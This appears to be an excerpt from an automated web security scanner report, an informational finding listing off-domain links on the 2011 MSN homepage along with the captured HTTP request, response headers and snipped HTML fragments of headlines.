<li class="ter media"><a href="http://www.bing.com/videos/watch/video/ultimate-tuna-sandwich/1l0coown2?q=tuna&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=50002">A twist on tuna to reduce calories at lunch </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=medicine+for+headache&amp;form=msnhed&amp;GT1=36010">Bing: Best medicines for headaches </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=diy+back+massage&amp;form=msnhed&amp;GT1=36010">Search: How to give yourself a great back massage </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=best+natural+cures&amp;form=msnhed&amp;GT1=36010">Find: Top natural remedies for your health </a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/42746178/ns/us_news-weird_news/?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/36/7F763816150D85F8072177134541E.jpg" title="Image: Video still of alligator found in Alexis Dunbar's bathroom (.. WFLA-TV)" width="303" height="117" alt="Image: Video still of alligator found in Alexis Dunbar's bathroom (.. WFLA-TV)" /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/21134540/vp/42746726#42746726?from=en-us_msnhp&amp;GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/D5/7463DA2933A8892BF5589C562961B.jpg" title="Image: Video still of John Haley, owner of The Old Boot Inn (.. 'Today')" width="128" height="73" alt="Image: Video still of John Haley, owner of The Old Boot Inn (.. 'Today')" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=botox+emotional+perception&amp;FORM=msnhed&amp;GT1=36010">Find: Botox may reduce ability to empathize </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=russians+sex+space&amp;form=msnhed&amp;GT1=36010">Search: Russia says 'nyet' to space sex rumors </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=grandsons+old+pregnancy+drug&amp;form=msnspe&amp;gt1=36010">Bing: Grandsons affected by old pregnancy drugs </a>
...[SNIP]...
<a href="http://movies.msn.com/movies/article.aspx?news=642794"><img class="landscape" src="http://col.stb.s-msn.com/i/81/52417FBEF253DCB56A25347747144.jpg" title="Image: Jennifer Lawrence in 'Winter's Bone' (.. Roadside Attraction)" width="128" height="73" alt="Image: Jennifer Lawrence in 'Winter's Bone' (.. Roadside Attraction)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Joel+Schumacher+hive&amp;form=msnhed&amp;GT1=36010">Bing: Joel Schumaker to direct 'The Hive'</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=liberace+biopic&amp;form=msnhed&amp;gt1=36010">Bing: Is the Liberace biopic still aiming for a fall start?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ian+holm+the+hobbit&amp;form=msnhed&amp;gt1=36010">Bing: Ian Holm confirmed for 'The Hobbit'?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/browse?g=movies_in_theaters&amp;form=msnhed&amp;gt1=36010">Bing: Browse movies in theaters now</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://msn.careerbuilder.com/Article/MSN-2561-Career-Growth-and-Change-Should-you-accept-that-job-offer/?SiteId=cbmsnjm42561&amp;sc_extcmp=JS_2561_jobmod"><img class="landscape" src="http://col.stb.s-msn.com/i/54/CE344AC4F6E4ABA411D9B1B0A5B3C.jpg" title="Image: Tiny man figurine &amp; 'Yes/No' cube (.. RUNSTUDIO/Getty Images)" width="128" height="73" alt="Image: Tiny man figurine &amp; 'Yes/No' cube (.. RUNSTUDIO/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://msn.careerbuilder.com/Article/MSN-2561-Career-Growth-and-Change-Should-you-accept-that-job-offer/?SiteId=cbmsnjm42561&amp;sc_extcmp=JS_2561_jobmod"><strong>
...[SNIP]...
<p>Tips to make a <a href="http://msn.careerbuilder.com/Article/MSN-2561-Career-Growth-and-Change-Should-you-accept-that-job-offer/?SiteId=cbmsnjm42561&amp;sc_extcmp=JS_2561_jobmod">confident &amp; informed decision</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2205-Job-Info-and-Trends-30-Jobs-that-Earn-30-an-Hour/?SiteId=cbmsnjm42205&amp;sc_extcmp=JS_2205_jobmod">30 jobs that earn $30 an hour</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/interviews/7-secrets-for-a-smarter-job-search/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">7 secrets for a smarter job search</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2553-Cover-Letters-Resumes-Your-work-history-How-far-back-should-you-go-on-a-r..sum../?SiteId=cbmsnjm42553&amp;sc_extcmp=JS_2553_jobmod">How far back should you go on a r..sum..?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/custom/msn/postresume.aspx?siteid=cbmsnjmPR">Post your r..sum.. for easier job hunting</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2369-Salaries-and-Promotions-What-Happens-if-I-Embellish-My-Salary-History/?SiteId=cbmsnjm42369&amp;sc_extcmp=JS_2369_jobmod">What if I embellish my salary history?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+with+a+Jaw-Dropping+View%3a+Lake+Louise%2c+Alberta&amp;cid=msntab1183787&amp;form=HPTRAV"><img class="landscape" src="http://col.stb.s-msn.com/i/7D/93CDE8746BED3770EAD59B9E42AC2E.jpg" title="Image: View from rooftop deck, Inn at the Market, Seattle (.. Mark Bauschke/Courtesy of Inn at the Market)" width="128" height="73" alt="Image: View from rooftop deck, Inn at the Market, Seattle (.. Mark Bauschke/Courtesy of Inn at the Market)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+with+a+Jaw-Dropping+View%3a+Lake+Louise%2c+Alberta&amp;cid=msntab1183787&amp;form=HPTRAV"><strong>
...[SNIP]...
<p>Beautiful places where the <a href="http://www.bing.com/travel/content/search?q=Hotels+with+a+Jaw-Dropping+View%3a+Lake+Louise%2c+Alberta&amp;cid=msntab1183787&amp;form=HPTRAV">vista is the main attraction</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=When+is+an+Airplane+Too+Old+to+Fly%3f&amp;cid=msntab1183872&amp;FORM=HPTRAV">When is an airplane too old to fly? </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Rain+Forest+Adventures%3a+Borneo&amp;cid=msntab1182776&amp;FORM=HPTRAV">Monkeys, lemurs &amp; bears, oh, my! 12 rain forest trips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Top+Natural+Wonders+for+Kids%3a+Yellowstone+National+Park&amp;cid=msntab1150443&amp;form=HPTRAV">Top natural wonders that'll impress your kids</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Around+the+World+in+40+Days%3a+The+Project&amp;cid=msntab1184049&amp;FORM=HPTRAV">Travel around the world in 40 days</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/ext/search/air?e=LAS&amp;dow=5&amp;dur=2&amp;wo=0&amp;FORM=TRMSN1">Last-minute flights to Vegas this weekend</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotel/hotelValidate?e=LOS_ANGELES_CA_US&amp;dow=7&amp;dur=7&amp;wo=4&amp;FORM=TRMSN1">Spend a week in Los Angeles next month</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/ext/search/air?e=NYC&amp;dow=6&amp;dur=7&amp;wo=4&amp;FORM=TRMSN1">Fly to New York next month</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon">Find deals on airfares from your city</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Explore a new destination</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://msn.careerbuilder.com/Article/MSN-2348-Job-Search-10-Ways-to-Score-That-Job-Offer/?SiteId=cbmsnsl42348&amp;sc_extcmp=JS_2348_spotlight&amp;gt1=23000"><img src="http://col.stb.s-msn.com/i/2A/5B8A72559FFD53A5326CBA63ACC995.jpg" title="Image: Businessmen in meeting (.. Supernova/Getty Images)" width="75" height="128" alt="Image: Businessmen in meeting (.. Supernova/Getty Images)" /></a>
...[SNIP]...
<li class="first"><a href="http://msn.careerbuilder.com/Article/MSN-2348-Job-Search-10-Ways-to-Score-That-Job-Offer/?SiteId=cbmsnsl42348&amp;sc_extcmp=JS_2348_spotlight&amp;gt1=23000">10 ways to score that job offer</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2245-Job-Search-6-Ways-to-Job-Search-Smarter-Not-Harder/?SiteId=cbmsnsl42245&amp;sc_extcmp=JS_2245_spotlight&amp;gt1=23000">Job search made smarter, not harder </a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2560-Job-Search-Sell-yourself-How-your-job-search-is-like-running-a-business/?SiteId=cbmsnsl42560&amp;sc_extcmp=JS_2560_spotlight&amp;gt1=23000">Run your job search like a business</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2418-Job-Search-Does-Persistence-Really-Pay/?SiteId=cbmsnsl42418&amp;sc_extcmp=JS_2418_spotlight&amp;gt1=23000">Does persistence really pay off?</a>
...[SNIP]...
<li class="last"><a href="http://msn.careerbuilder.com/Article/MSN-2425-Job-Search-Im-Experiencing-Job-Search-Burnout/?SiteId=cbmsnsl42425&amp;sc_extcmp=JS_2425_spoptlight&amp;gt1=23000">How to handle job-search burnout</a>
...[SNIP]...
<div class="actions"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303842995&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.msn.com%2F%3Feuid%3DB506C07761D7465D924574124E3C14DF%26userGroup%3DW:default%26PM%3Dz:1&amp;lc=1033&amp;id=1184" class="dMSNME_1">Sign in</a>
...[SNIP]...
<a href="http://g.msn.com/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

19.137. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?euid=B506C07761D7465D924574124E3C14DF&userGroup=W:default&PM=z:1 HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=40II8A39_0214:WP10_5|; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA33
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 55871
Content-Length: 55871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<li><a href="http://www.bltwy.com">bltwy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">SPORTS</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl">nfl</a></li><li><a href="http://msn.foxsports.com/mlb">mlb</a></li><li><a href="http://msn.foxsports.com/nba">nba</a></li><li><a href="http://msn.foxsports.com/nhl">nhl</a></li><li><a href="http://msn.foxsports.com/collegefootball">ncaa football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">nascar</a></li><li><a href="http://msn.foxsports.com/foxsoccer">soccer</a></li><li><a href="http://msn.foxsports.com/tennis">tennis</a></li><li><a href="http://msn.foxsports.com/golf">golf</a></li><li><a href="http://msn.foxsports.com/fantasy">fantasy games</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp">video</a>
...[SNIP]...
<li><a href="http://money.bundle.com/mymoney">my money</a>
...[SNIP]...
<li class="last"><a href="http://msn.careerbuilder.com/msn/default.aspx?SiteId=cbmsn_home">careers</a>
...[SNIP]...
<li><a href="http://www.delish.com/">cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1">local directory</a>
...[SNIP]...
<li class="last"><a href="http://msn.whitepages.com/">white pages</a>
...[SNIP]...
<li><a href="http://royals.today.com/?FORM=MSNLED">ROYAL WEDDING</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/browse?g=royal_family#toc=0&amp;FORM=MSNLED">royal family</a>
...[SNIP]...
<li><a href="http://windsorknot.today.com/?FORM=MSNLED">blog</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">maps</a></li><li><a href="http://www.discovermsn.com">mobile</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">video</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">shopping</a></li><li><a href="http://insidemsn.wordpress.com/">corrections</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB ">feedback</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=April+26&amp;mkt=en-us&amp;FORM=MSNHPT">Tuesday, April 26, 2011</a>
...[SNIP]...
<a href="http://realestate.msn.com/slideshow.aspx?cp-documentid=28379341&amp;GT1=35006"><img src="http://col.stb.s-msn.com/i/B1/48897AE0C09E47101DFBE1A4C86D.jpg" title="Image: Real estate sign in front of house (.. Jeff Haynes/Getty Images)" width="303" height="211" alt="Image: Real estate sign in front of house (.. Jeff Haynes/Getty Images)" /></a>
...[SNIP]...
<a href="http://specials.msn.com/A-List/Entertainment/Latin-music-award-nominees.aspx?cp-documentid=28466463&amp;imageindex=1"><img src="http://col.stb.s-msn.com/i/DF/833A3CC62784C5514D9E3C674B82C.jpg" title="Image: Shakira (.. William Fernando Martinez/AP)" width="303" height="211" alt="Image: Shakira (.. William Fernando Martinez/AP)" /></a>
...[SNIP]...
<li><a href="http://msnlatino.telemundo.com/entretenimiento/Premios_Billboard_2011_ENG/photo_gallery/2011-04/all_the_finalists">Photos: 2011 Latin Music Billboard Award finalists</a>
...[SNIP]...
<li class="last"><a href="http://msnlatino.telemundo.com/entretenimiento/Premios_Billboard_2011_ENG/photo_gallery/2011-04/kings_and_queens_of_latin_music">Full coverage of the awards on Telemundo</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/42762039/ns/weather/?GT1=43001"><img src="http://col.stb.s-msn.com/i/EA/851A3D5A5779C3FCF01C9DCCF7453A.jpg" title="Image: A street department worker patrols a flooded neighborhood Tuesday in Poplar Bluff, Mo. (.. Jeff Roberson/AP)" width="206" height="144" alt="Image: A street department worker patrols a flooded neighborhood Tuesday in Poplar Bluff, Mo. (.. Jeff Roberson/AP)" /></a>
...[SNIP]...
<a href="http://music.msn.com/music/article.aspx?news=643162&amp;GT1=28102"><img src="http://col.stb.s-msn.com/i/BF/6A4672605F740223A9554532020D0.jpg" title="Image: Phoebe Snow performs in 1975 (.. Henry Diltz/Corbis)" width="206" height="144" alt="Image: Phoebe Snow performs in 1975 (.. Henry Diltz/Corbis)" /></a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://msn.foxsports.com/nfl/story/NFL-draft-prospects-justin-houston-christian-ballard-failed-Combine-drug-test-042611?GT1=39002"><img src="http://col.stb.s-msn.com/i/AA/AC396DE9E6C1AE2C12ECE3962417.jpg" title="Image: Justin Houston of Georgia at the NFL Scouting Combine in February (.. Joe Robbins/Getty Images)" width="206" height="144" alt="Image: Justin Houston of Georgia at the NFL Scouting Combine in February (.. Joe Robbins/Getty Images)" /></a><a href="http://msn.foxsports.com/nfl/story/NFL-draft-prospects-justin-houston-christian-ballard-failed-Combine-drug-test-042611?GT1=39002">Source: Prospects failed drug tests</a>
...[SNIP]...
<a href="http://freshperspectives.msn.com/theme/challenge/artist/jeffreynishinaka1/videos/51?WT.mc_id=msnhp&amp;from=en-us_msnhp&amp;GT1=25081"><img src="http://col.stb.s-msn.com/i/32/155EE97E6DA2521552D8DA68EBE8A5.jpg" title="Image: Video still of sculpture by paper artist Jeff Nishinaka (.. BRW/Microsoft) " width="303" height="211" alt="Image: Video still of sculpture by paper artist Jeff Nishinaka (.. BRW/Microsoft) " /></a>
...[SNIP]...
<a href="http://money.msn.com/home-loans/home-buying-calculator.aspx?GT1=33032"><img src="http://col.stb.s-msn.com/i/B5/1BEC18756B24584CDBD43051C4CA5.jpg" title="Image: Couple with paperwork &amp; laptop (.. Tetra Images/Corbis)" width="303" height="211" alt="Image: Couple with paperwork &amp; laptop (.. Tetra Images/Corbis)" /></a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegefootball/story/ohio-state-buckeyes-jim-tressel-should-go-down-fighting-for-NCAA-change-042611?GT1=39002">Opinion: Tressel's way out is ...</a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-look/spring-style/staticslideshowinstyle.aspx?cp-documentid=27794053&amp;gt1=32100"><img class="portrait" src="http://col.stb.s-msn.com/i/4D/879D2CBC59109F5AC8143472E262C8.jpg" title="Image: Diane Kruger wearing white skirt (.. Spread Pictures/Fame Pictures)" width="116" height="175" alt="Image: Diane Kruger wearing white skirt (.. Spread Pictures/Fame Pictures)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.delish.com/recipes/menu-planner/better-than-takeout-chinese-feast?GT1=47066">Better-than-takeout Chinese dishes </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=raccoon+purse+golf+course&amp;FORM=msnhed&amp;GT1=36010">Find: Raccoon swipes purse at golf course</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=god+particle&amp;qpvt=god+particle&amp;FORM=msnhed&amp;GT1=36010">Search: 'God particle' found?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=human+cannonball+killed&amp;qpvt=human+cannonball+killed&amp;FORM=msnhed&amp;GT1=36010">Bing: Stunt kills 'human cannonball'</a>
...[SNIP]...
<a href="http://money.msn.com/how-to-budget/article.aspx?post=e04807fc-e307-45c7-a3b0-9fdabfac3518?GT1=33029"><img class="landscape" src="http://col.stb.s-msn.com/i/A7/A9F2451016AFF381B7FEAA77BDBE96.jpg" title="Image: Woman pumping gas (.. Getty Images)" width="303" height="117" alt="Image: Woman pumping gas (.. Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-life/better-yourself/staticslideshowglamour.aspx?cp-documentid=15188306&amp;gt1=32099"><img class="landscape" src="http://col.stb.s-msn.com/i/F4/B5C8AC92995875875DA022B31C86A.jpg" title="Image: Felice Belle (.. Aya Brackett &amp; Philippe Salomon/Glamour)" width="303" height="117" alt="Image: Felice Belle (.. Aya Brackett &amp; Philippe Salomon/Glamour)" /></a>
...[SNIP]...
<a href="http://disneydestinations.msn.com/articles/5/27584087?ocid=disneymsnhp&amp;gt1=32096"><img class="landscape" src="http://col.stb.s-msn.com/i/BF/5B3190FA2C50C44416F939E9AED92.jpg" title="Image: Mad Hatter &amp; Alice with teacups (.. Disney)" width="128" height="73" alt="Image: Mad Hatter &amp; Alice with teacups (.. Disney)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/shopping/search?q=spring+blush+colors&amp;form=msnhed&amp;gt1=36010">Shop: Put some spring into your blush shade </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+keep+your+cool+in+a+relationship&amp;form=msnhed&amp;gt1=36010">Find: How to keep your cool in a relationship</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+long+to+keep+receipts&amp;form=msnhed&amp;gt1=36010">Bing: How long should you keep your receipts? </a>
...[SNIP]...
<a href="http://wonderwall.msn.com/music/black-eyed-peas-star-taboo-is-a-dad-again-1615774.story?gt1=28135"><img class="portrait" src="http://col.stb.s-msn.com/i/42/F2DDD5A0E57637D5488EC7CAE475A.jpg" title="Image: Taboo (.. Dan Steinberg/HP)" width="116" height="175" alt="Image: Taboo (.. Dan Steinberg/HP)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=coco+ice-t+reality&amp;qpvt=coco+ice-t+reality&amp;FORM=msnhed&amp;GT1=36010">Bing: Coco &amp; Ice-T to star in reality show</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=lollapalooza+lineup&amp;form=msnhed&amp;GT1=36010">Find: Lollapalooza 2011 lineup announced</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Gwyneth+Paltrow+Coach&amp;FORM=msnhed&amp;GT1=36010">Search: Gwyneth Paltrow is new face of Coach</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/NFL-top-10-draft-myths-042211"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/03/14/031411-4pmET-Roger-Goodell-Sam-Bradford-FOX-FLASH-PI_20110314152439639_303_117.JPG" width="303" height="117" alt="Image: Roger Goodell and Sam Bradford of the St. Louis Rams (.. Jeff Zelevansky/Getty Images)" /></a></div><div><a href="http://msn.foxsports.com/nfl/lists/NFL-top-10-draft-myths-042211">Biggest myths about the NFL draft</a>
...[SNIP]...
<p>"You gotta come from a big school! First-year QBs can't succeed right away!" Adam Caplan <a href="http://msn.foxsports.com/nfl/lists/NFL-top-10-draft-myths-042211">debunks them all</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/NFL-collective-bargaining-agreement-deadline-union-updates-blog-030311">Lockout updates: NFL prohibits 'football' activities</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/story/Tiger-Woods-to-miss-Wells-Fargo-event-with-injury-blames-awkward-shot-in-Masters-042611">Tiger sidelined, blames awkward shot in Masters</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/chicago-bears-qb-jay-cutler-proposes-engaged-to-reality-tv-babe-kristin-cavallari-042611">Report: NFL quarterback engaged to reality TV star</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/Ex-MLB-outfielder-Carl-Everett-arrested-in-Florida-042611">Ex-MLB star accused of pointing gun at wife's head</a>
...[SNIP]...
<li class="ter media"><a href="http://msn.foxsports.com/video/shows/barfly?vid=b091026b-a57c-4540-b468-fc6a52046bd4 &amp;from=en-us_msnhp">Even Cowboys owner deserves a little sympathy</a>
...[SNIP]...
<li class="ter"><a href="http://nflbuzz.yardbarker.com/blog/nflbuzz/msn/report_tcu_offensive_tackle_has_lymphoma/4626547">Report: NFL prospect diagnosed with lymphoma</a>
...[SNIP]...
<li class="ter"><a href="http://scouthoops.scout.com/2/1067340.html">NBA coach's son among best hoops prospects</a>
...[SNIP]...
<a href="http://health.msn.com/health-topics/adhd/articlepage.aspx?cp-documentid=100271092&amp;gt1=31001"><img class="portrait" src="http://col.stb.s-msn.com/i/6F/F0C39264309F339D377051EA26B9F3.jpg" title="Image: Boy sitting on tree branch (.. M. Eric Honeycutt/Vetta/Getty Images) " width="116" height="175" alt="Image: Boy sitting on tree branch (.. M. Eric Honeycutt/Vetta/Getty Images) " /></a>
...[SNIP]...
<a href="http://fitbie.msn.com/eat-right/tips/one-day-flatter-belly?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/F9/7F8E46E6A58BA2FAB11F53815EE789.jpg" title="Image: Woman reaching for blueberries in bowl (.. Shuji Kobayashi/Taxi/Getty Images)" width="128" height="73" alt="Image: Woman reaching for blueberries in bowl (.. Shuji Kobayashi/Taxi/Getty Images)" /></a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/ultimate-tuna-sandwich/1l0coown2?q=tuna&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=50002">A twist on tuna to reduce calories at lunch </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=medicine+for+headache&amp;form=msnhed&amp;GT1=36010">Bing: Best medicines for headaches </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=diy+back+massage&amp;form=msnhed&amp;GT1=36010">Search: How to give yourself a great back massage </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=best+natural+cures&amp;form=msnhed&amp;GT1=36010">Find: Top natural remedies for your health </a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/42746178/ns/us_news-weird_news/?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/36/7F763816150D85F8072177134541E.jpg" title="Image: Video still of alligator found in Alexis Dunbar's bathroom (.. WFLA-TV)" width="303" height="117" alt="Image: Video still of alligator found in Alexis Dunbar's bathroom (.. WFLA-TV)" /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/21134540/vp/42746726#42746726?from=en-us_msnhp&amp;GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/D5/7463DA2933A8892BF5589C562961B.jpg" title="Image: Video still of John Haley, owner of The Old Boot Inn (.. 'Today')" width="128" height="73" alt="Image: Video still of John Haley, owner of The Old Boot Inn (.. 'Today')" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=botox+emotional+perception&amp;FORM=msnhed&amp;GT1=36010">Find: Botox may reduce ability to empathize </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=russians+sex+space&amp;form=msnhed&amp;GT1=36010">Search: Russia says 'nyet' to space sex rumors </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=grandsons+old+pregnancy+drug&amp;form=msnspe&amp;gt1=36010">Bing: Grandsons affected by old pregnancy drugs </a>
...[SNIP]...
<a href="http://movies.msn.com/movies/article.aspx?news=642794"><img class="landscape" src="http://col.stb.s-msn.com/i/81/52417FBEF253DCB56A25347747144.jpg" title="Image: Jennifer Lawrence in 'Winter's Bone' (.. Roadside Attraction)" width="128" height="73" alt="Image: Jennifer Lawrence in 'Winter's Bone' (.. Roadside Attraction)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Joel+Schumacher+hive&amp;form=msnhed&amp;GT1=36010">Bing: Joel Schumaker to direct 'The Hive'</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=liberace+biopic&amp;form=msnhed&amp;gt1=36010">Bing: Is the Liberace biopic still aiming for a fall start?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ian+holm+the+hobbit&amp;form=msnhed&amp;gt1=36010">Bing: Ian Holm confirmed for 'The Hobbit'?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/browse?g=movies_in_theaters&amp;form=msnhed&amp;gt1=36010">Bing: Browse movies in theaters now</a>
...[SNIP]...
